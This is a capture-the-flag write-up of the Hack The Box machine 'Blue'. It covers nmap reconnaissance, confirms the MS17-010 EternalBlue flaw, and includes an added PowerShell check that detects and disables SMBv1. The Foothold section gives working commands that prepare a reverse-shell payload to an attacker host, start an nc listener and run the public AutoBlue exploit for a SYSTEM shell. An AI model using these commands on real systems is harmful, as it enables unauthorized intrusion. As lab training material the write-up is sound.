Blue
An unpatched Windows 7 SMBv1 server is vulnerable to EternalBlue (MS17-010); a single unauthenticated kernel-pool overflow returns a SYSTEM shell, making both flags trivially reachable — this post covers recon through the user flag.
Overview
Blue, while possibly the simplest machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.
Machine Matrix
CVE-dominated: a single MS17-010/EternalBlue (CVE-2017-0144) unauthenticated kernel RCE is the entire box, with trivial enumeration and a point-and-click public PoC.
Recon
| Port | Service | Notes |
|---|---|---|
| 135/tcp | msrpc | Windows RPC endpoint mapper |
| 139/tcp | netbios-ssn | SMB over NetBIOS |
| 445/tcp | microsoft-ds | SMBv1 — the target |
| 49152-49157/tcp | msrpc | Dynamic RPC ports |
nmap -sVC -p- --open 10.129.11.192
The scan paints a classic legacy-Windows profile: the RPC endpoint mapper on 135, NetBIOS/SMB on 139 and 445, and a spread of high dynamic RPC ports. SMB is the entry point.
Enumeration
An OS-discovery scan fingerprints the host, and the MS17-010 NSE script confirms the box is unpatched:
nmap -p445 --script smb-os-discovery 10.129.11.192
nmap -p139,445 --script smb-vuln-ms17-010 10.129.11.192
The OS comes back as Windows 7 Professional 7601 Service Pack 1, and smb-vuln-ms17-010 reports VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010). That is the whole assessment — an unauthenticated kernel RCE is sitting on port 445.
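The NSE script gives the network-side verdict; as an added example (not part of this writeup), the host-side check and fix for the same exposure, run on the Windows 7 SP1 / Server 2008 R2 host itself. It reads whether SMBv1 is still enabled on the server side and whether either March 2017 MS17-010 package is installed (KB4012212 security-only, KB4012215 monthly rollup); later cumulative rollups supersede those KBs, so an absent KB is a prompt to verify, not proof of exposure. The function names are my own.

```powershell
# Added example, not the writeup's code. Host-side MS17-010 exposure check for
# Windows 7 SP1 / Server 2008 R2 (PowerShell 2.0 compatible, run as administrator).
# Assumption: KB4012212 / KB4012215 are the March 2017 MS17-010 packages for this
# platform; later monthly rollups supersede them, so "no KB found" means "go verify".

function Test-Ms17010Exposure {
    param(
        [string[]]$PatchIds = @('KB4012212', 'KB4012215')
    )

    # 1. Is SMBv1 still served?  On Windows 7 the switch is the SMB1 DWORD under
    #    LanmanServer\Parameters; a missing value means enabled (the default).
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1 = (Get-ItemProperty -Path $params -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($null -eq $smb1) -or ($smb1 -ne 0)

    # 2. Is one of the MS17-010 packages present in the installed-hotfix list?
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $PatchIds -contains $_.HotFixID } |
        ForEach-Object { $_.HotFixID })

    # Exposed = SMBv1 reachable AND no known MS17-010 package seen.
    New-Object PSObject -Property @{
        ComputerName   = $env:COMPUTERNAME
        Smb1Enabled    = $smb1Enabled
        Ms17010Patches = $installed
        Exposed        = ($smb1Enabled -and ($installed.Count -eq 0))
    }
}

function Disable-Smb1Server {
    # Mitigation independent of patching: stop serving SMBv1 at all. Takes effect
    # after the LanmanServer service restarts or the host reboots.
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    Set-ItemProperty -Path $params -Name SMB1 -Type DWord -Value 0 -Force
}

# Report first; call Disable-Smb1Server once nothing legitimate still needs SMBv1.
Test-Ms17010Exposure | Format-List ComputerName, Smb1Enabled, Ms17010Patches, Exposed
```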
Foothold
EternalBlue (CVE-2017-0144) is an out-of-bounds write in the SMBv1 Trans2 transaction handler. A crafted request that miscounts its extended-attribute buffer overflows a non-paged kernel pool allocation; grooming the pool and overflowing into an adjacent SMB structure yields a controlled write, which is used to plant and execute shellcode in kernel context. Because the malformed transaction is processed before authentication, no credentials are needed.
Using a non-Metasploit PoC (3ndG4me’s AutoBlue), generate a staged reverse-shell payload and fire it at the x64 target:
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r AutoBlue-MS17-010/requirements.txt
bash AutoBlue-MS17-010/shellcode/shell_prep.sh # reverse shell, LHOST=10.10.16.13, LPORT=4444
Start a listener, then launch the Windows 7 x64 exploit:
nc -lvnp 4444
python2 AutoBlue-MS17-010/eternalblue_exploit7.py 10.129.11.192 AutoBlue-MS17-010/shellcode/sc_x64.bin
It may take a couple of attempts, but the overflow eventually succeeds and the listener catches a shell. Because the payload runs in the kernel, the shell is already SYSTEM:
C:\Windows\system32> whoami
nt authority\system
Flags
With a SYSTEM shell there is no privilege escalation to do — both flags are readable in one go, since type accepts multiple paths:
type C:\Users\haris\Desktop\user.txt C:\Users\Administrator\Desktop\root.txt